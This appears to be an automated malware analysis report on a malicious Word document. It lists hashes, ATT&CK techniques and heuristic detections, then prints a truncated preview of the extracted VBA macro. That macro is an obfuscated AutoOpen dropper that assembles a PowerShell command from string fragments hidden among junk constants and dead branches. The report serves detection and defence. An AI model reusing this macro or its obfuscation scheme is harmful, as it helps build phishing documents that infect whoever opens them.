Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 98624a3f28b4a20a…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 376.5 KB
Created: 2018-10-05 03:41:00
Authoring application: Microsoft Office Word
First seen: 2019-04-17
MD5: 06b530fa1ca1c706b92d66c3b4f0e85d
SHA-1: f53448a875bd990c8e6a39cc1917641a8f1e3121
SHA-256: 98624a3f28b4a20a24834ab5cd80a0e1429d94d5a1841d19e4588d330fcb339e
Risk Score: 350

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function, which is a common technique for malicious documents. The macro utilizes obfuscation and calls to Shell() and CreateObject(), indicating it is designed to download and execute a second-stage payload. The heuristic 'OLE_VBA_SPLIT_KEYWORD_OBFUSCATION' specifically points to the reassembly of 'scripting.filesystemobject', a strong indicator of malicious intent.

Heuristics (10)

  • ClamAV: Doc.Dropper.Agent-7154387-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7154387-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#  [In document text (OLE body)]
    • http://ns.adobe.com/xap/1.0/  [In document text (OLE body)]
    • http://purl.org/dc/elements/1.1/  [In document text (OLE body)]
    • http://ns.adobe.com/xap/1.0/mm/  [In document text (OLE body)]
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#  [In document text (OLE body)]
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#  [In document text (OLE body)]
    • http://ns.adobe.com/photoshop/1.0/  [In document text (OLE body)]
    • http://ns.adobe.com/tiff/1.0/  [In document text (OLE body)]
    • http://ns.adobe.com/exif/1.0/  [In document text (OLE body)]
    • http://schemas.openxmlformats.org/drawingml/2006/main  [In document text (OLE body)]

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 75837 bytes
SHA-256: 0585cbf00f3c450f17755880beef2799692da628d4c6a6c94fd8f047e8eef4ba

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function er()

End Function
Sub AutoOpen()
Const yu_lieu = False
Const ueahfm = True
Const mjixcp3 = True
Const ea_cb_iyfr0 = False
Const koey = True
Const atuua = False

If 7205 <= 1602 Then
Const ijvroi0 = True
Const kyyaicb = False
Const eigloi = False
Const ulah = True
Const lycwdv = False
ElseIf 16 + 9 = 7 Then
Else
uuueiyfky = "$cdfvibhmunnjq_qa='r"
End If
Select Case "usaaywcu"
Case "usaaywcu"
ys_ukc = "sF';$ee"
uuueiyfky = uuueiyfky + ys_ukc
End Select
Const lioeie42 = False

If 6104 >= 9008 Then
Const yeeug = False
Const ukhrryea = False
Const utnpu_vn = True
Const vxuaygpy = True
Const imiag_a = True
ElseIf 6772 < 7168 Then
ycdxuvqbxhs67 = Environ("SystemRoot")
Else
Const mhdppy4 = True
Const uybluyr7 = True
Const cilzt = False
Const rhjibvw = True
Const aoozpoa = True
End If
Const urue = False

Select Case 42 - 21
Case 21
tzunszww = ee_zyoaie + uuueiyfky
tzunszww = tzunszww + "uozlieuoynvsam"
End Select
Select Case "yfnqhofti"
Case "yfnqhofti"
yeutee = mezzofgbjmv + tzunszww + zcmaeyvf_o
yeutee = yeutee + "y='ion"
Case 23242
Const szqo_xbou = False
End Select
Const tyutc = True

Select Case 14 * 13
Case 182
pgqjzkefekp = "Poli';$mc"
Const a_gaets = True
Const djlaee = False
yeutee = yeutee + pgqjzkefekp
End Select
Const n_fqbr = True
Const itgxre = True

If 48 - 2 = 50 Then
Else
kwpoa = yeutee + wxciomz
Const stv_obdku = True
iuxjo = "nicpqneooaygs=''',';$okmvkhcu_ytvijcgb"
kwpoa = kwpoa + iuxjo
End If
Const kpoesrvz = True

Select Case 34 + 33
Case 67
wzivsmhizbw = yiubxfvz + kwpoa + iijwfnhgat
Const vquwpnn = True
Const ynnohi = True
olmnso_rkwdb = "vohly_urvlrrbaby='.W';$xxoydz"
wzivsmhizbw = oyksiwp + wzivsmhizbw + olmnso_rkwdb
End Select
Const jrnko = True
Const sdnopko = False

If 62 + 39 = 23 Then
ElseIf 88 * 63 = 5544 Then
ayua = "rll"
wzivsmhizbw = wzivsmhizbw + ayua
Else
Const tfnvfix = False
Const y_f_i_osnc = False
Const mnxy = True
Const pra_bo_o = True
Const outhu = True
Const u_aufhebx = False
Const mittpo = True
End If
Const mxaeo = False

Select Case "uaue_y"
Case "uaue_y"
wzivsmhizbw = wzivsmhizbw + "u_tcyib_rf_ygnbgewkwik" + m_fnun
Case ajqnkxzikk
Const ihym = True
Case yippcbanw59
Const wgrdgi = False
End Select
Select Case 13 + 38
Case oaiu_srn7
Const hdunuacn37 = False
Case 51
iafdatbb = wzivsmhizbw + aevu7
iafdatbb = iafdatbb + "dymoxbyhv='{ $ua " + viyewvw
End Select
Const ffyqv01 = False
Const trpstzoqfa = False

If 50 + 51 = -1 Then
Const uz_tiia = False
Const ydmf_yph = True
Const eyboxvz = True
Const ywvj_pyy = True
ElseIf 5413 >= 787 Then
Dim bnfripksldy, uacluz As String
bnfripksldy = "\sys"
ycdxuvqbxhs67 = ycdxuvqbxhs67 + bnfripksldy
Else
Const wexlpdvi = True
Const slwiei = False
Const gaqz = True
Const uie_u = True
Const bbpifjr = True
Const hipbz = False
End If
Const gtitpbnxy = False

If 59 - 73 = 132 Then
Const ohcida = True
Const ojyucd = True
Const snrfxt = False
Const p_uikjo = False
Const jfuudjq = True
Const bplaye = True
Const kfcjpgnzup00 = False
Const yyybgrzv = False
Const oale = False
Const wbsmxyeo = False
Else
eyuuqpiwj = iafdatbb
Const gsux_rh = False
Const oixzg = False
eyuuqpiwj = eyuuqpiwj + "= ';$y_xzi"
End If
Const oapyst = True

If 7 * 46 = 322 Then
asfbjk = eyuuqpiwj
Const iupba = False
asfbjk = asfbjk + "z" + qwzfww
End If
Const qjumci = True

If 5532 <= 7014 Then
o_czviyfdet = asfbjk
obcv = "eaefkljyxdoyazcqhsnwcofriob"
o_czviyfdet = o_czviyfdet + obcv + ufhlvra
ElseIf 50 + 51 = -1 Then
Const yhsiu = True
Const sgo_vql = False
Const frksouimh = True
Const qkeabh = True
Else
End If
Select Case 60 * 77
Case 4620
o_czviyfdet = o_czviyfdet + "chs='le(1)';$jncdxoacycyg
... (truncated)